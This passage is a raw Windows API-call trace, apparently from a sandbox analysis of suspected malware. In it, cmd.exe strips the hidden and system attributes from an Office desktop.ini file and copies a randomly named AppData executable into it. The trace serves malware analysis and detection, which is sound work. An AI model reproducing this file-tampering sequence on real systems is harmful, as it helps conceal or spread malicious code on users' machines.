[0152.097] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0152.198] SetErrorMode (uMode=0x0) returned 0x0 [0152.198] SetErrorMode (uMode=0x1) returned 0x0 [0152.198] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x300618, lpFilePart=0x1af16c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1af16c*="Desktop") returned 0x18 [0152.198] SetErrorMode (uMode=0x0) returned 0x1 [0152.198] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0152.198] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0152.204] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0152.205] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x1aeee8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aeee8) returned 0xffffffff [0152.205] GetLastError () returned 0x2 [0152.205] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x1aeee8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aeee8) returned 0xffffffff [0152.205] GetLastError () returned 0x2 [0152.205] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x1aeee8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aeee8) returned 0x302660 [0152.205] FindClose (in: hFindFile=0x302660 | out: hFindFile=0x302660) returned 1 [0152.205] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x1aeee8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aeee8) returned 0xffffffff 
[0152.206] GetLastError () returned 0x2 [0152.206] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x1aeee8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aeee8) returned 0x302660 [0152.206] FindClose (in: hFindFile=0x302660 | out: hFindFile=0x302660) returned 1 [0152.206] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0152.206] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0152.206] GetConsoleTitleW (in: lpConsoleTitle=0x1af3e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0152.206] InitializeProcThreadAttributeList (in: lpAttributeList=0x1af268, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1af330 | out: lpAttributeList=0x1af268, lpSize=0x1af330) returned 1 [0152.206] UpdateProcThreadAttribute (in: lpAttributeList=0x1af268, dwFlags=0x0, Attribute=0x60001, lpValue=0x1af328, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1af268, lpPreviousValue=0x0) returned 1 [0152.206] GetStartupInfoW (in: lpStartupInfo=0x1af224 | out: lpStartupInfo=0x1af224*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0152.206] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0152.207] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x1af2c4*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib -r -s -h 
\"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1af310 | out: lpCommandLine="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\desktop.ini\" ", lpProcessInformation=0x1af310*(hProcess=0x50, hThread=0x4c, dwProcessId=0xcb0, dwThreadId=0xca0)) returned 1 [0152.256] CloseHandle (hObject=0x4c) returned 1 [0152.256] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0152.256] GetEnvironmentStringsW () returned 0x300b50* [0152.257] FreeEnvironmentStringsW (penv=0x300b50) returned 1 [0152.257] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0152.488] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x1af204 | out: lpExitCode=0x1af204*=0x0) returned 1 [0152.488] CloseHandle (hObject=0x50) returned 1 [0152.488] _vsnwprintf (in: _Buffer=0x1af34c, _BufferCount=0x13, _Format="%08X", _ArgList=0x1af210 | out: _Buffer="00000000") returned 8 [0152.488] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0152.488] GetEnvironmentStringsW () returned 0x302680* [0152.488] FreeEnvironmentStringsW (penv=0x302680) returned 1 [0152.488] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0152.488] GetEnvironmentStringsW () returned 0x302680* [0152.489] FreeEnvironmentStringsW (penv=0x302680) returned 1 [0152.489] DeleteProcThreadAttributeList (in: lpAttributeList=0x1af268 | out: lpAttributeList=0x1af268) [0152.489] GetConsoleTitleW (in: lpConsoleTitle=0x1af5e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0152.489] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x1ae660, 
lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x1ae664, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x1ae660*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0152.489] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0152.489] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0152.489] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0152.489] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\desktop.ini" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\desktop.ini")) returned 0xffffffff [0152.489] GetLastError () returned 0x2 [0152.489] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036")) returned 0x2010 [0152.490] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0152.490] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0152.490] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\desktop.ini" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\desktop.ini")) returned 0xffffffff [0152.490] GetLastError () returned 0x2 [0152.490] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\desktop.ini", fInfoLevelId=0x0, lpFindFileData=0x30377c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30377c) returned 0xffffffff [0152.490] GetLastError () returned 0x2 [0152.490] _get_osfhandle (_FileHandle=2) returned 0xb [0152.490] GetFileType (hFile=0xb) returned 0x2 [0152.490] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0152.490] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1af060 | out: lpMode=0x1af060) returned 1 [0152.490] _get_osfhandle (_FileHandle=2) returned 0xb [0152.490] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, 
lpConsoleScreenBufferInfo=0x1af094 | out: lpConsoleScreenBufferInfo=0x1af094) returned 1 [0152.491] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0152.491] _get_osfhandle (_FileHandle=1) returned 0x7 [0152.491] _get_osfhandle (_FileHandle=1) returned 0x7 [0152.491] _get_osfhandle (_FileHandle=1) returned 0x7 [0152.491] GetFileType (hFile=0x7) returned 0x2 [0152.491] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0152.491] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1af784 | out: lpMode=0x1af784) returned 1 [0152.492] _dup (_FileHandle=1) returned 3 [0152.492] _close (_FileHandle=1) returned 0 [0152.492] _wcsicmp (_String1="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\desktop.ini", _String2="con") returned -53 [0152.492] CreateFileW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\desktop.ini" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x1af754, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50 [0152.492] _open_osfhandle (_OSFileHandle=0x50, _Flags=8) returned 1 [0152.492] GetConsoleTitleW (in: lpConsoleTitle=0x1af584, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0152.493] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe", fInfoLevelId=0x1, lpFindFileData=0x1af0e8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1af0e8) returned 0x302810 [0152.493] _wcsicmp (_String1="XEY8d7zI.exe", _String2=".") returned 74 [0152.493] _wcsicmp (_String1="XEY8d7zI.exe", _String2="..") returned 74 [0152.493] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: 
"c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0152.493] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1adff4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0152.493] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 4 [0152.493] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.493] GetFileType (hFile=0x58) returned 0x1 [0152.493] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.493] GetFileSize (in: hFile=0x58, lpFileSizeHigh=0x1ae04c | out: lpFileSizeHigh=0x1ae04c*=0x0) returned 0x7d600 [0152.493] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.493] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.493] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.493] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.495] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.495] GetFileType (hFile=0x50) returned 0x1 [0152.495] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.495] GetFileType (hFile=0x50) returned 0x1 [0152.495] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.495] WriteFile (in: hFile=0x50, lpBuffer=0x1aee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.496] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.496] GetFileType (hFile=0x50) returned 0x1 [0152.496] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.496] WriteFile (in: hFile=0x50, lpBuffer=0x1aeed4*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aeed4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.496] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.496] GetFileType (hFile=0x50) returned 0x1 [0152.496] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.496] WriteFile (in: hFile=0x50, lpBuffer=0x1aef24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef24*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.496] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.496] GetFileType (hFile=0x50) returned 0x1 [0152.496] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.496] WriteFile (in: hFile=0x50, lpBuffer=0x1aef74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef74*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.496] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.496] GetFileType (hFile=0x50) returned 0x1 [0152.496] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.496] WriteFile (in: hFile=0x50, lpBuffer=0x1aefc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aefc4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.496] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.496] GetFileType (hFile=0x50) returned 0x1 [0152.496] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.496] WriteFile (in: hFile=0x50, lpBuffer=0x1af014*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af014*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.496] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.497] GetFileType (hFile=0x50) returned 0x1 [0152.497] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.497] WriteFile (in: hFile=0x50, lpBuffer=0x1af064*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae068, 
lpOverlapped=0x0 | out: lpBuffer=0x1af064*, lpNumberOfBytesWritten=0x1ae068*=0x20, lpOverlapped=0x0) returned 1 [0152.497] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.497] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae054 | out: lpNewFilePointer=0x0) returned 1 [0152.497] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.497] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.497] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.497] GetFileType (hFile=0x50) returned 0x1 [0152.497] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.497] GetFileType (hFile=0x50) returned 0x1 [0152.497] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.497] WriteFile (in: hFile=0x50, lpBuffer=0x1aee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.497] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.497] GetFileType (hFile=0x50) returned 0x1 [0152.497] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.497] WriteFile (in: hFile=0x50, lpBuffer=0x1aeed4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aeed4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.497] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.497] GetFileType (hFile=0x50) returned 0x1 [0152.497] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.497] WriteFile (in: hFile=0x50, lpBuffer=0x1aef24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef24*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.498] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.498] GetFileType (hFile=0x50) returned 0x1 [0152.498] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0152.498] WriteFile (in: hFile=0x50, lpBuffer=0x1aef74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef74*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.498] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.498] GetFileType (hFile=0x50) returned 0x1 [0152.498] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.498] WriteFile (in: hFile=0x50, lpBuffer=0x1aefc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aefc4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.498] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.498] GetFileType (hFile=0x50) returned 0x1 [0152.498] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.498] WriteFile (in: hFile=0x50, lpBuffer=0x1af014*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af014*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.498] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.498] GetFileType (hFile=0x50) returned 0x1 [0152.498] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.498] WriteFile (in: hFile=0x50, lpBuffer=0x1af064*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af064*, lpNumberOfBytesWritten=0x1ae068*=0x20, lpOverlapped=0x0) returned 1 [0152.498] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.498] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae054 | out: lpNewFilePointer=0x0) returned 1 [0152.499] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.499] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.499] _get_osfhandle (_FileHandle=1) returned 0x50 
[0152.499] GetFileType (hFile=0x50) returned 0x1 [0152.499] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.499] GetFileType (hFile=0x50) returned 0x1 [0152.499] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.499] WriteFile (in: hFile=0x50, lpBuffer=0x1aee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.499] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.499] GetFileType (hFile=0x50) returned 0x1 [0152.499] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.499] WriteFile (in: hFile=0x50, lpBuffer=0x1aeed4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aeed4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.499] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.499] GetFileType (hFile=0x50) returned 0x1 [0152.499] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.499] WriteFile (in: hFile=0x50, lpBuffer=0x1aef24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef24*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.499] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.499] GetFileType (hFile=0x50) returned 0x1 [0152.500] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.500] WriteFile (in: hFile=0x50, lpBuffer=0x1aef74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef74*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.500] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.500] GetFileType (hFile=0x50) returned 0x1 [0152.500] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.500] WriteFile (in: hFile=0x50, lpBuffer=0x1aefc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aefc4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) 
returned 1 [0152.500] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.500] GetFileType (hFile=0x50) returned 0x1 [0152.500] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.500] WriteFile (in: hFile=0x50, lpBuffer=0x1af014*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af014*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.500] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.500] GetFileType (hFile=0x50) returned 0x1 [0152.500] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.500] WriteFile (in: hFile=0x50, lpBuffer=0x1af064*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af064*, lpNumberOfBytesWritten=0x1ae068*=0x20, lpOverlapped=0x0) returned 1 [0152.500] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.500] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae054 | out: lpNewFilePointer=0x0) returned 1 [0152.500] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.500] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.500] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.500] GetFileType (hFile=0x50) returned 0x1 [0152.500] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.500] GetFileType (hFile=0x50) returned 0x1 [0152.501] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.501] WriteFile (in: hFile=0x50, lpBuffer=0x1aee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.501] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.501] GetFileType (hFile=0x50) returned 0x1 [0152.501] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.501] WriteFile (in: hFile=0x50, lpBuffer=0x1aeed4*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aeed4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.501] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.501] GetFileType (hFile=0x50) returned 0x1 [0152.501] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.501] WriteFile (in: hFile=0x50, lpBuffer=0x1aef24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef24*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.501] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.501] GetFileType (hFile=0x50) returned 0x1 [0152.501] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.501] WriteFile (in: hFile=0x50, lpBuffer=0x1aef74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef74*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.501] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.501] GetFileType (hFile=0x50) returned 0x1 [0152.501] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.501] WriteFile (in: hFile=0x50, lpBuffer=0x1aefc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aefc4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.501] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.501] GetFileType (hFile=0x50) returned 0x1 [0152.501] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.501] WriteFile (in: hFile=0x50, lpBuffer=0x1af014*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af014*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.502] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.502] GetFileType (hFile=0x50) returned 0x1 [0152.502] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.502] WriteFile (in: hFile=0x50, lpBuffer=0x1af064*, nNumberOfBytesToWrite=0x20, 
lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af064*, lpNumberOfBytesWritten=0x1ae068*=0x20, lpOverlapped=0x0) returned 1 [0152.502] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.502] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae054 | out: lpNewFilePointer=0x0) returned 1 [0152.502] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.502] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.502] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.502] GetFileType (hFile=0x50) returned 0x1 [0152.502] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.502] GetFileType (hFile=0x50) returned 0x1 [0152.502] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.502] WriteFile (in: hFile=0x50, lpBuffer=0x1aee84*, nNumberOfBytesToWrite=0x50, 